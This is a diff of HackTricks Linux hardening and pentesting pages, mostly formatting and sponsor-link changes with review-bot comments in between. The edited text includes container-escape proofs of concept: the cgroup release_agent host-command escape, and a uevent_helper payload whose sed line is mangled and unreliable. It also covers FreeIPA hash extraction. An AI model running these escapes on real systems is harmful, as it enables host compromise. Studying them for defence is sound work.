You can find **examples** on how to **exploit some RCE vulnerabilities** to get scripting languages **reverse shells** and execute binaries from memory in [**https://github.com/carlospolop/DistrolessRCE**](https://github.com/carlospolop/DistrolessRCE).
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/linux-hardening/freeipa-pentesting.md b/linux-hardening/freeipa-pentesting.md
index 218b58079..e6f420519 100644
--- a/linux-hardening/freeipa-pentesting.md
+++ b/linux-hardening/freeipa-pentesting.md
@@ -126,11 +126,11 @@ To crack these hashes:
• If new version of FreeIPA is used, so **PBKDF2\_SHA256** is used: You should decode **base64** -> find PBKDF2\_SHA256 -> it’s **length** is 256 byte. John can work with 256 bits (32 byte) -> SHA-265 used as the pseudo-random function, block size is 32 byte -> you can use only first 256 bit of our PBKDF2\_SHA256 hash -> John The Ripper or hashcat can help you to crack it
-
+
To extract the hashes you need to be **root in the FreeIPA server**, there you can use the tool **`dbscan`** to extract them:
-
+
### HBAC-Rules
diff --git a/linux-hardening/linux-environment-variables.md b/linux-hardening/linux-environment-variables.md
index 31612f08d..b3e0ab537 100644
--- a/linux-hardening/linux-environment-variables.md
+++ b/linux-hardening/linux-environment-variables.md
@@ -127,19 +127,19 @@ Change how your prompt looks.
Root:
-![](<../.gitbook/assets/image (894).png>)
+![](<../.gitbook/assets/image (897).png>)
Regular user:
-![](<../.gitbook/assets/image (737).png>)
+![](<../.gitbook/assets/image (740).png>)
One, two and three backgrounded jobs:
-![](<../.gitbook/assets/image (142).png>)
+![](<../.gitbook/assets/image (145).png>)
One background job, one stopped and last command didn't finish correctly:
-![](<../.gitbook/assets/image (712).png>)
+![](<../.gitbook/assets/image (715).png>)
**Try Hard Security Group**
diff --git a/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md b/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md
index b5a131fbc..1165268a8 100644
--- a/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md
+++ b/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md
@@ -1,4 +1,4 @@
-
+# PAM - Pluggable Authentication Modules
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-### [WhiteIntel](https://whiteintel.io)
+#### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -26,21 +26,20 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
-
-## Basic Information
+### Basic Information
**PAM (Pluggable Authentication Modules)** acts as a security mechanism that **verifies the identity of users attempting to access computer services**, controlling their access based on various criteria. It's akin to a digital gatekeeper, ensuring that only authorized users can engage with specific services while potentially limiting their usage to prevent system overloads.
-### Configuration Files
+#### Configuration Files
-- **Solaris and UNIX-based systems** typically utilize a central configuration file located at `/etc/pam.conf`.
-- **Linux systems** prefer a directory approach, storing service-specific configurations within `/etc/pam.d`. For instance, the configuration file for the login service is found at `/etc/pam.d/login`.
+* **Solaris and UNIX-based systems** typically utilize a central configuration file located at `/etc/pam.conf`.
+* **Linux systems** prefer a directory approach, storing service-specific configurations within `/etc/pam.d`. For instance, the configuration file for the login service is found at `/etc/pam.d/login`.
An example of a PAM configuration for the login service might look like this:
-```text
+```
auth required /lib/security/pam_securetty.so
auth required /lib/security/pam_nologin.so
auth sufficient /lib/security/pam_ldap.so
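Review bot: The opening fence of the PAM configuration example loses its `text` info string and becomes a bare fence. Keep `text` so renderers do not guess a language for the `auth required /lib/security/...` lines and so the block stays consistent with the other fenced examples in the repo, which carry a tag. The heading demotions in this hunk (`## Basic Information` to `###`, `### Configuration Files` to `####`) are consistent with the new H1 added at the top of the file.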
@@ -53,35 +52,35 @@ password required /lib/security/pam_pwdb.so use_first_pass
session required /lib/security/pam_unix_session.so
```
-### **PAM Management Realms**
+#### **PAM Management Realms**
These realms, or management groups, include **auth**, **account**, **password**, and **session**, each responsible for different aspects of the authentication and session management process:
-- **Auth**: Validates user identity, often by prompting for a password.
-- **Account**: Handles account verification, checking for conditions like group membership or time-of-day restrictions.
-- **Password**: Manages password updates, including complexity checks or dictionary attacks prevention.
-- **Session**: Manages actions during the start or end of a service session, such as mounting directories or setting resource limits.
+* **Auth**: Validates user identity, often by prompting for a password.
+* **Account**: Handles account verification, checking for conditions like group membership or time-of-day restrictions.
+* **Password**: Manages password updates, including complexity checks or dictionary attacks prevention.
+* **Session**: Manages actions during the start or end of a service session, such as mounting directories or setting resource limits.
-### **PAM Module Controls**
+#### **PAM Module Controls**
Controls dictate the module's response to success or failure, influencing the overall authentication process. These include:
-- **Required**: Failure of a required module results in eventual failure, but only after all subsequent modules are checked.
-- **Requisite**: Immediate termination of the process upon failure.
-- **Sufficient**: Success bypasses the rest of the same realm's checks unless a subsequent module fails.
-- **Optional**: Only causes failure if it's the sole module in the stack.
+* **Required**: Failure of a required module results in eventual failure, but only after all subsequent modules are checked.
+* **Requisite**: Immediate termination of the process upon failure.
+* **Sufficient**: Success bypasses the rest of the same realm's checks unless a subsequent module fails.
+* **Optional**: Only causes failure if it's the sole module in the stack.
-### Example Scenario
+#### Example Scenario
In a setup with multiple auth modules, the process follows a strict order. If the `pam_securetty` module finds the login terminal unauthorized, root logins are blocked, yet all modules are still processed due to its "required" status. The `pam_env` sets environment variables, potentially aiding in user experience. The `pam_ldap` and `pam_unix` modules work together to authenticate the user, with `pam_unix` attempting to use a previously supplied password, enhancing efficiency and flexibility in authentication methods.
-## References
+### References
+
* [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
+#### [WhiteIntel](https://whiteintel.io)
-### [WhiteIntel](https://whiteintel.io)
-
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
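Review bot: After the demotion in this hunk, `#### [WhiteIntel]` sits directly below `### References`, so the sponsor block becomes a subsection of the reference list in the page outline and in any generated table of contents. Keep the sponsor heading at the same level as `### References`, or separate it from the list with the `***` rule this patch already uses after the top sponsor block.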
@@ -91,7 +90,6 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
-
Learn AWS hacking from zero to hero withhtARTE (HackTricks AWS Red Team Expert)!
@@ -101,9 +99,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
diff --git a/linux-hardening/linux-privilege-escalation-checklist.md b/linux-hardening/linux-privilege-escalation-checklist.md
index f0e1df445..a46dbd7c3 100644
--- a/linux-hardening/linux-privilege-escalation-checklist.md
+++ b/linux-hardening/linux-privilege-escalation-checklist.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@@ -167,7 +167,7 @@ Stay informed with the newest bug bounties launching and crucial platform update
* [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)?
* [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)?
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
diff --git a/linux-hardening/privilege-escalation/README.md b/linux-hardening/privilege-escalation/README.md
index a3101c8e0..a3652fc18 100644
--- a/linux-hardening/privilege-escalation/README.md
+++ b/linux-hardening/privilege-escalation/README.md
@@ -1277,7 +1277,7 @@ screen -ls
screen -ls / # Show another user' screen sessions
```
-![](<../../.gitbook/assets/image (138).png>)
+![](<../../.gitbook/assets/image (141).png>)
**Attach to a session**
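Review bot: The renumbered reference `image (141).png` keeps an empty alt text (`![](...)`), so nothing in the Markdown says which screenshot is expected under the `screen -ls` block. Since the asset number is the only thing that changes here, add a short alt text (for example that it shows the `screen -ls` output) so that a wrong image after renumbering is detectable in review, and confirm that the renamed asset is the same screenshot.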
@@ -1299,7 +1299,7 @@ ps aux | grep tmux #Search for tmux consoles not using default folder for socket
tmux -S /tmp/dev_sess ls #List using that socket, you can start a tmux session in that socket with: tmux -S /tmp/dev_sess
```
-![](<../../.gitbook/assets/image (834).png>)
+![](<../../.gitbook/assets/image (837).png>)
**Attach to a session**
diff --git a/linux-hardening/privilege-escalation/docker-security/README.md b/linux-hardening/privilege-escalation/docker-security/README.md
index 77f6e82a8..2b93aca99 100644
--- a/linux-hardening/privilege-escalation/docker-security/README.md
+++ b/linux-hardening/privilege-escalation/docker-security/README.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=docker-security) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-security" %}
## **Basic Docker Engine Security**
@@ -118,13 +118,13 @@ When switching Docker hosts, it's necessary to move the root and repository keys
***
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=docker-security) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-security" %}
## Containers Security Features
@@ -435,13 +435,13 @@ If you have access to the docker socket or have access to a user in the **docker
* [https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57](https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57)
* [https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/](https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/)
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=docker-security) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-security" %}
diff --git a/linux-hardening/privilege-escalation/docker-security/apparmor.md b/linux-hardening/privilege-escalation/docker-security/apparmor.md
index 701508815..2c2b5240e 100644
--- a/linux-hardening/privilege-escalation/docker-security/apparmor.md
+++ b/linux-hardening/privilege-escalation/docker-security/apparmor.md
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
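Review bot: The "Join the" bullet changed here still labels the link `@carlospolopm` while the destination points to `twitter.com/hacktricks\_live`, so the visible handle and the target account disagree. The PAM page in this same patch uses `@hacktricks\_live` as the label for that URL; since the line is being edited anyway, align the label with the destination, and drop the backslash from the URL part.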
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
## Basic Information
@@ -34,15 +34,15 @@ AppArmor is a **kernel enhancement designed to restrict the resources available
There are two operational modes for AppArmor profiles:
-- **Enforcement Mode**: This mode actively enforces the policies defined within the profile, blocking actions that violate these policies and logging any attempts to breach them through systems like syslog or auditd.
-- **Complain Mode**: Unlike enforcement mode, complain mode does not block actions that go against the profile's policies. Instead, it logs these attempts as policy violations without enforcing restrictions.
+* **Enforcement Mode**: This mode actively enforces the policies defined within the profile, blocking actions that violate these policies and logging any attempts to breach them through systems like syslog or auditd.
+* **Complain Mode**: Unlike enforcement mode, complain mode does not block actions that go against the profile's policies. Instead, it logs these attempts as policy violations without enforcing restrictions.
### Components of AppArmor
-- **Kernel Module**: Responsible for the enforcement of policies.
-- **Policies**: Specify the rules and restrictions for program behavior and resource access.
-- **Parser**: Loads policies into the kernel for enforcement or reporting.
-- **Utilities**: These are user-mode programs that provide an interface for interacting with and managing AppArmor.
+* **Kernel Module**: Responsible for the enforcement of policies.
+* **Policies**: Specify the rules and restrictions for program behavior and resource access.
+* **Parser**: Loads policies into the kernel for enforcement or reporting.
+* **Utilities**: These are user-mode programs that provide an interface for interacting with and managing AppArmor.
### Profiles path
@@ -322,7 +322,7 @@ chmod +x /tmp/test.pl
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -341,7 +341,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/linux-hardening/privilege-escalation/docker-security/cgroups.md b/linux-hardening/privilege-escalation/docker-security/cgroups.md
index 3eec63969..7707b8a3a 100644
--- a/linux-hardening/privilege-escalation/docker-security/cgroups.md
+++ b/linux-hardening/privilege-escalation/docker-security/cgroups.md
@@ -53,15 +53,15 @@ The output structure is as follows:
The filesystem is typically utilized for accessing **cgroups**, diverging from the Unix system call interface traditionally used for kernel interactions. To investigate a shell's cgroup configuration, one should examine the **/proc/self/cgroup** file, which reveals the shell's cgroup. Then, by navigating to the **/sys/fs/cgroup** (or **`/sys/fs/cgroup/unified`**) directory and locating a directory that shares the cgroup's name, one can observe various settings and resource usage information pertinent to the cgroup.
-![Cgroup Filesystem](<../../../.gitbook/assets/image (1125).png>)
+![Cgroup Filesystem](<../../../.gitbook/assets/image (1128).png>)
The key interface files for cgroups are prefixed with **cgroup**. The **cgroup.procs** file, which can be viewed with standard commands like cat, lists the processes within the cgroup. Another file, **cgroup.threads**, includes thread information.
-![Cgroup Procs](<../../../.gitbook/assets/image (278).png>)
+![Cgroup Procs](<../../../.gitbook/assets/image (281).png>)
Cgroups managing shells typically encompass two controllers that regulate memory usage and process count. To interact with a controller, files bearing the controller's prefix should be consulted. For instance, **pids.current** would be referenced to ascertain the count of threads in the cgroup.
-![Cgroup Memory](<../../../.gitbook/assets/image (674).png>)
+![Cgroup Memory](<../../../.gitbook/assets/image (677).png>)
The indication of **max** in a value suggests the absence of a specific limit for the cgroup. However, due to the hierarchical nature of cgroups, limits might be imposed by a cgroup at a lower level in the directory hierarchy.
@@ -93,7 +93,7 @@ The **root cgroup** is an exception to these rules, allowing direct process plac
**Monitoring CPU usage** within a cgroup is possible through the `cpu.stat` file, displaying total CPU time consumed, helpful for tracking usage across a service's subprocesses:
-
+
## References
diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md
index 7ab788121..9996d5837 100644
--- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md
+++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=docker-breakout-privilege-escalation) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-breakout-privilege-escalation" %}
## Automatic Enumeration & Escape
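Review bot: The two new Trickest URLs in this hunk carry different parameter sets: the text link adds `utm_term=trickest`, while the `{% embed %}` URL omits it. The docker-security README in this patch uses neither form of `utm_term`, so this looks accidental rather than deliberate. Use the same parameters in both places, differing only in `utm_medium=text` versus `utm_medium=banner`, and apply the same choice to the two repeated blocks later in this file.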
@@ -522,12 +522,12 @@ cat /proc/self/status | grep CapEff
The second technique explained in the post [https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/](https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/) indicates how you can abuse bind mounts with user namespaces, to affect files inside the host (in that specific case, delete files).
-
+
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=docker-breakout-privilege-escalation) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-breakout-privilege-escalation" %}
## CVEs
@@ -664,12 +664,12 @@ If you are in **userspace** (**no kernel exploit** involved) the way to find new
* [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket)
* [https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4)
-
+
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=docker-breakout-privilege-escalation) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-breakout-privilege-escalation" %}
diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
index 4234eddcf..a869bc18e 100644
--- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
+++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -26,10 +26,9 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
-
-**For further details, refer to the [original blog post](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/).** This is just a summary:
+**For further details, refer to the** [**original blog post**](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)**.** This is just a summary:
Original PoC:
@@ -44,24 +43,24 @@ $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
The proof of concept (PoC) demonstrates a method to exploit cgroups by creating a `release_agent` file and triggering its invocation to execute arbitrary commands on the container host. Here's a breakdown of the steps involved:
1. **Prepare the Environment:**
- - A directory `/tmp/cgrp` is created to serve as a mount point for the cgroup.
- - The RDMA cgroup controller is mounted to this directory. In case of absence of the RDMA controller, it's suggested to use the `memory` cgroup controller as an alternative.
+ * A directory `/tmp/cgrp` is created to serve as a mount point for the cgroup.
+ * The RDMA cgroup controller is mounted to this directory. In case of absence of the RDMA controller, it's suggested to use the `memory` cgroup controller as an alternative.
```shell
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
```
2. **Set Up the Child Cgroup:**
- - A child cgroup named "x" is created within the mounted cgroup directory.
- - Notifications are enabled for the "x" cgroup by writing 1 to its notify_on_release file.
+ * A child cgroup named "x" is created within the mounted cgroup directory.
+ * Notifications are enabled for the "x" cgroup by writing 1 to its notify\_on\_release file.
```shell
echo 1 > /tmp/cgrp/x/notify_on_release
```
3. **Configure the Release Agent:**
- - The path of the container on the host is obtained from the /etc/mtab file.
- - The release_agent file of the cgroup is then configured to execute a script named /cmd located at the acquired host path.
+ * The path of the container on the host is obtained from the /etc/mtab file.
+ * The release\_agent file of the cgroup is then configured to execute a script named /cmd located at the acquired host path.
```shell
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
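Review bot: In steps 2 and 3 the file names are now written as `notify\_on\_release` and `release\_agent` with escaped underscores in plain prose, while step 5 of the same list already writes `release_agent` in backticks. Wrap these names, and the paths `/etc/mtab`, `/cmd` and `/output`, in backticks instead of escaping them, so the identifiers render exactly as they appear in the shell blocks and can be searched for verbatim.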
@@ -69,7 +68,7 @@ echo "$host_path/cmd" > /tmp/cgrp/release_agent
```
4. **Create and Configure the /cmd Script:**
- - The /cmd script is created inside the container and is configured to execute ps aux, redirecting the output to a file named /output in the container. The full path of /output on the host is specified.
+ * The /cmd script is created inside the container and is configured to execute ps aux, redirecting the output to a file named /output in the container. The full path of /output on the host is specified.
```shell
echo '#!/bin/sh' > /cmd
@@ -78,8 +77,8 @@ chmod a+x /cmd
```
5. **Trigger the Attack:**
- - A process is initiated within the "x" child cgroup and is immediately terminated.
- - This triggers the `release_agent` (the /cmd script), which executes ps aux on the host and writes the output to /output within the container.
+ * A process is initiated within the "x" child cgroup and is immediately terminated.
+ * This triggers the `release_agent` (the /cmd script), which executes ps aux on the host and writes the output to /output within the container.
```shell
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
@@ -87,7 +86,7 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -106,7 +105,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
index 4f8d58a07..f1f30aa70 100644
--- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
+++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
{% embed url="https://websec.nl/" %}
@@ -138,23 +138,23 @@ This directory permits access to modify kernel variables, usually via `sysctl(2)
* Writing to `/sys/kernel/uevent_helper` can execute arbitrary scripts upon `uevent` triggers.
* **Example for Exploitation**: %%%bash
- ### Creates a payload
+ #### Creates a payload
echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper
- ### Finds host path from OverlayFS mount for container
+ #### Finds host path from OverlayFS mount for container
host\_path=$(sed -n 's/._\perdir=(\[^,]_).\*/\1/p' /etc/mtab)
- ### Sets uevent\_helper to malicious helper
+ #### Sets uevent\_helper to malicious helper
echo "$host\_path/evil-helper" > /sys/kernel/uevent\_helper
- ### Triggers a uevent
+ #### Triggers a uevent
echo change > /sys/class/mem/null/uevent
- ### Reads the output
+ #### Reads the output
cat /output %%%
